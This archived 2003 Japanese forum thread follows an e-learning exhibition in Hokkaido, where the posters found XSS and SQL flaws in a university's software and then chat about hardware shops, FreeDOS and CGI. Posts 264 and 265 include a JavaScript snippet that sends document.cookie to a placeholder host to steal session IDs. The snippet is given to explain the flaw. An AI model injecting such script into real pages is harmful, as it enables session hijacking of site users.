2010/8/22:本掲示板は閲覧専用です。データが一部破損しておりますがご了承ください。
  新規投稿 ┃ツリー表示 ┃スレッド表示 ┃一覧表示 ┃トピック表示 ┃番号順表示 ┃検索 ┃設定 ┃ホーム  
310 / 376 ツリー ←次へ | 前へ→

【262】e-learning Hokkaido ぱんとら 03/8/30(土) 15:03

【263】Re:e-learning Hokkaido ひよひよ 03/8/30(土) 20:05
【264】Re:e-learning Hokkaido ぱんとら 03/8/30(土) 21:38
【265】Re:e-learning Hokkaido ひよひよ 03/8/30(土) 22:06
【266】Re:e-learning Hokkaido HIGUMA 03/8/31(日) 20:09
【267】Re:e-learning Hokkaido ひよひよ 03/8/31(日) 21:05
【269】Re:e-learning Hokkaido ぱんとら 03/8/31(日) 22:16
【270】Re:e-learning Hokkaido ひよひよ 03/8/31(日) 23:02

【263】Re:e-learning Hokkaido
←back ↑menu ↑top forward→
 ひよひよ  - 03/8/30(土) 20:05 -

引用なし
パスワード
   ▼ぱんとらさん:
>お疲れ様でした。
>ほんと、人が来なくて大変そうでしたね。
いやはや、ようやく終わりました。人が来なくてすごぉ〜く大変でした。来場予定者数 7000 人ということだったのですが...(?_?)

>某大学のブースで、突然、XSSの脆弱性とSQL実行できる脆弱性を指摘して、
>まさかダイエーで飯喰う事になるとは...。
いやはや、ホント偶然ってあるもんですねぇ〜。おかげで楽しいひと時を過ごせました。週明けには担当の先生に報告するわけですが、なんて報告したら良いのやら。パンフレット余りまくりですよ(爆) でもまぁ、バグも発見されたことだし、今後もうちょっとマシになればよいのですが... ただバグ修正は誰がするんでしょうかねぇ。

>久々に怪しげな会話していて楽しかったです。(笑)
私もです。上には上がいると常々思いながら生活しているわけですが、ちょっとブッチギリ感が...

>来年、たぶん勤務地は大手町でしょ?こちらは茅場町なので、
>秋葉原の裏の裏まで歩きたければ案内します。
>アニメ系の店は知らんけど、ジャンク屋は沢山知っている。
それは心強い!!ぜひお願いします。

>ま、変人同士仲良くしましょー。どぞ、よろしく。
変人同士と言われても何の違和感も感じない俺ってもう社会復帰はできないんでしょうか...

【264】Re:e-learning Hokkaido
 ぱんとら WEB  - 03/8/30(土) 21:38 -

引用なし
パスワード
   ▼ひよひよさん:
> いやはや、ようやく終わりました。人が来なくてすごぉ〜く大変でした。
> 来場予定者数 7000 人ということだったのですが...(?_?)

来場予定者数って、チケット配った枚数なんでしょうか?
それとも動員可能人数だったんでしょうか。
そもそもe-learningに興味がある道民が7000人もいるのか?

> おかげで楽しいひと時を過ごせました。週明けには担当の先生に
> 報告するわけですが、なんて報告したら良いのやら。
> パンフレット余りまくりですよ(爆)

頂いたパンフ読みましたよ。
現に某大学の数箇所で稼働しているようですね。
まぁ、プログラムなんて動けばいいんですけど。(笑)

JavaScriptでlocation.hrefを使うと攻撃性のあるページ飛ばせるんです。
<script language="JavaScript">
location.href = "http://hogehoge/logging.cgi?data=" + document.cookie;
</script>
という具合に書けば、cookieに入っているセッションIDが盗めますので、
セッション乗っ取りされちゃいます。

他、preタグの開始タグのみかかれるとページ全体が崩れますよね。

> でもまぁ、バグも発見されたことだし、今後もうちょっとマシに
> なればよいのですが... ただバグ修正は誰がするんでしょうかねぇ。

あの後、ソース公開されているんかなーっと。
いろいろ漁っていたんですが、メール出さないともらえないっぽいですね。
java.util.regexの正規表現機能を使ってサニタイジングするだけなんで
Java Servletが分かる人なら修正できるかと思います。

Pantora NetworksとCrystal Dew Worldで共同受注しますか?
開発は札幌駅のベスト電器横のドトールあたりで。(笑)

>> アニメ系の店は知らんけど、ジャンク屋は沢山知っている。
> それは心強い!!ぜひお願いします。

自称「エンタープライズオタク」なんで、
行き先はサーバ、ワークステーションや業務用ルータのお店が中心かな。
一般どころではPlatHomeとかOTTO UNIX館が好き。

前、部屋にマシン12台、ルータ8台くらいあって、
友人宅とVPN構築したり、業務用の機器で変な遊びばかりしてました。
ほとんど、今年の春、ヤフーオークションで売ってしまいましたが...。

>> ま、変人同士仲良くしましょー。どぞ、よろしく。
> 変人同士と言われても何の違和感も感じない俺
> ってもう社会復帰はできないんでしょうか...

いいんじゃないですか?
度が過ぎた変人は社会に貢献すると思います。

年齢気にせず、誰とでもフランクに話しますから、
典型的な日本型社会では嫌がられますけど...。

【265】Re:e-learning Hokkaido
 ひよひよ  - 03/8/30(土) 22:06 -

引用なし
パスワード
   ▼ぱんとらさん:
>来場予定者数って、チケット配った枚数なんでしょうか?
>それとも動員可能人数だったんでしょうか。
どうなんでしょうかねぇ〜。週明けにうちの教授(今回の実行委員長)に聞いてみようかなと思います。さて動員数は!? 終日会場には関係者ばかりが目立ったような気がするのですが...
>そもそもe-learningに興味がある道民が7000人もいるのか?
いるわけないな(爆)

>JavaScriptでlocation.hrefを使うと攻撃性のあるページ飛ばせるんです。
><script language="JavaScript">
>location.href = "http://hogehoge/logging.cgi?data=" + document.cookie;
></script>
>という具合に書けば、cookieに入っているセッションIDが盗めますので、
>セッション乗っ取りされちゃいます。
ありゃぁ〜確かにジャンプ先でクッキーの内容が取得できますねぇ〜。

>> でもまぁ、バグも発見されたことだし、今後もうちょっとマシに
>> なればよいのですが... ただバグ修正は誰がするんでしょうかねぇ。
>あの後、ソース公開されているんかなーっと。
>いろいろ漁っていたんですが、メール出さないともらえないっぽいですね。
どんな人に配布したかを把握しておきたいそうです。
誰がいつ直して本家に反映させておくのか確認しておきます。さすがに、このバグを放置したまま配布しまくるのは大問題でしょうしね。

>java.util.regexの正規表現機能を使ってサニタイジングするだけなんで
>Java Servletが分かる人なら修正できるかと思います。
ですね。

>Pantora NetworksとCrystal Dew Worldで共同受注しますか?
>開発は札幌駅のベスト電器横のドトールあたりで。(笑)
ドトールで無線LAN?? 私は無線LAN 持ってないので某FreeD で対抗しますかねぇ〜(笑)先生の対応しだいでは冗談ではなくなったりして。

>自称「エンタープライズオタク」なんで、
>行き先はサーバ、ワークステーションや業務用ルータのお店が中心かな。
>一般どころではPlatHomeとかOTTO UNIX館が好き。
私は、スタンダードに自作ショップやパソコン本屋さんが好きですね。いつかは買いたいと思いながら金欠でスルーしてしまった本も結構置いてありますからねぇ〜。

>度が過ぎた変人は社会に貢献すると思います。
同感です。

>年齢気にせず、誰とでもフランクに話しますから、
>典型的な日本型社会では嫌がられますけど...。
あはは、確かに私のほうが3つ上ですからね(一浪してます)。そこら辺は私も気にしないので、また熱く語り合おうではありませんか。でも、もうちょっと修行しておきます。

【266】Re:e-learning Hokkaido
 HIGUMA E-MAILWEB  - 03/8/31(日) 20:09 -

引用なし
パスワード
   えっと・・・( 一一)
んっと・・・( 一一)
こんな変人さんの掲示板にカキコしてもいいのでしょうか・・・(;一_一)

>あはは、確かに私のほうが3つ上ですからね(一浪してます)。そこら辺は私も気にしないので、また熱く語り合おうではありませんか。でも、もうちょっと修行しておきます。

オイラも熱く語れるように頑張るっす。(・。・;
ってか、も少し、最新技術ネタをしてくれると助かるっす。\(゜ロ\)(/ロ゜)/

話してて、さすが北大と思ったけど、北大の中でもひよひよさんは異色の人間なのですね。。。安心しました。(^_^)
ってか、俺も混ぜてーーー\(◎o◎)/!

【267】Re:e-learning Hokkaido
 ひよひよ  - 03/8/31(日) 21:05 -

引用なし
パスワード
   ▼HIGUMAさん:
>えっと・・・( 一一)
>んっと・・・( 一一)
>こんな変人さんの掲示板にカキコしてもいいのでしょうか・・・(;一_一)
大丈夫です。

>オイラも熱く語れるように頑張るっす。(・。・;
>ってか、も少し、最新技術ネタをしてくれると助かるっす。\(゜ロ\)(/ロ゜)/
グファ〜。えと CrystalMark を実行していただけるとわかると思うのですが、(Linux では動かないので学校ででも試してみてください) CPU を中心にハードウェアについてはかなり調査しています。Java や .NET 等最新ネタはちょっとかじっただけなんで勉強しておきます。

>話してて、さすが北大と思ったけど、北大の中でもひよひよさんは異色の人間なのですね。。。安心しました。(^_^)
>ってか、俺も混ぜてーーー\(◎o◎)/!
実はお二人に会わせたい人が一人いるかも。です。FreeDOS の開発に携わっていたこともあり、低レベル層にかなり詳しいです。CGI を書くときですら、 C でカリカリチューニングする職人気質な人ですが、彼ならぱんとらさんとも対等に話ができるのではないかなと思います。(私では力不足ですしね) そんなわけで、今度会うときは4人で会えたら楽しいかも。とてつもなく熱いことになりそうですが。

【269】Re:e-learning Hokkaido
 ぱんとら WEB  - 03/8/31(日) 22:16 -

引用なし
パスワード
   ▼ひよひよさん:
>> 話してて、さすが北大と思ったけど、北大の中でもひよひよさんは異色の人間なのですね。。。
>> 安心しました。(^_^)
>> ってか、俺も混ぜてーーー\(◎o◎)/!
> 実はお二人に会わせたい人が一人いるかも。です。
> FreeDOS の開発に携わっていたこともあり、低レベル層にかなり詳しいです。

DOSの将来性に見切りをつけて、もうしばらく経ちますが、
奇遇にもFreeDOS日本語化関連の掲示板にはよく出没しておりました。(爆)
ハンドルネームなら知っている方かも。(笑)

最近、C++やJava、PHPなどにどーぷり漬っているので、
たぶん。低レベル層の実装となると話についていけないかと思います、

リアルモードからプロテクトモードに移行する時に、CPUのパイプライン処理を無効にする為、
無意味なジャンプ入れる必要があるとか。基本的な事は覚えていますけどね。

> CGI を書くときですら、 C でカリカリチューニングする職人気質な人ですが、
> 彼ならぱんとらさんとも対等に話ができるのではないかなと思います。

私もC言語でPostgreSQLにアクセスするCGIを書いた事ありますが、
ムーアの法則が有効な限りサーバの処理速度は速くなりますし、
生産性が低い為、現実的じゃないです。(^_^;)

ほんと無意味なんですが、CGIにMMX使ったこともあります。

> (私では力不足ですしね) そんなわけで、今度会うときは4人で会えたら楽しいかも。
> とてつもなく熱いことになりそうですが。

とてつもなくアレゲな集まりになりそうですね。

【270】Re:e-learning Hokkaido
 ひよひよ  - 03/8/31(日) 23:02 -

引用なし
パスワード
   ▼ぱんとらさん:
>DOSの将来性に見切りをつけて、もうしばらく経ちますが、
>奇遇にもFreeDOS日本語化関連の掲示板にはよく出没しておりました。(爆)
>ハンドルネームなら知っている方かも。(笑)
私は、情報基盤センターで研究開発学生というのをやっているのですが、一緒にやっているお友達です。

情報基盤センター研究開発学生のページ
http://musee.cims.hokudai.ac.jp/

Koinec BinaryWorks HomePage
http://kotan.ec.hokudai.ac.jp/~koinec/

>私もC言語でPostgreSQLにアクセスするCGIを書いた事ありますが、
>ムーアの法則が有効な限りサーバの処理速度は速くなりますし、
>生産性が低い為、現実的じゃないです。(^_^;)
最近「生産性」という言葉が身にしみているところです。マシンは随分速くなりましたしねぇ〜。最適化はコンパイラにがんばってもらう方向で...VC7.1の最適化は素敵だ!!(VC6/7と比べて)

>ほんと無意味なんですが、CGIにMMX使ったこともあります。
考えたこともなかったけど、やろうと思えばやれますね...まぁ、文字列処理がメインなので C で書くのは大変なんでしょうけど。一度 Perl/PHP に慣れてしまうとちょっと。

>とてつもなくアレゲな集まりになりそうですね。
恐らく(^_^;;

310 / 376 ツリー ←次へ | 前へ→
  新規投稿 ┃ツリー表示 ┃スレッド表示 ┃一覧表示 ┃トピック表示 ┃番号順表示 ┃検索 ┃設定 ┃ホーム  
ページ:  ┃  記事番号:   
51982
(SS)C-BOARD v3.8(とほほ改ver2.1) is Free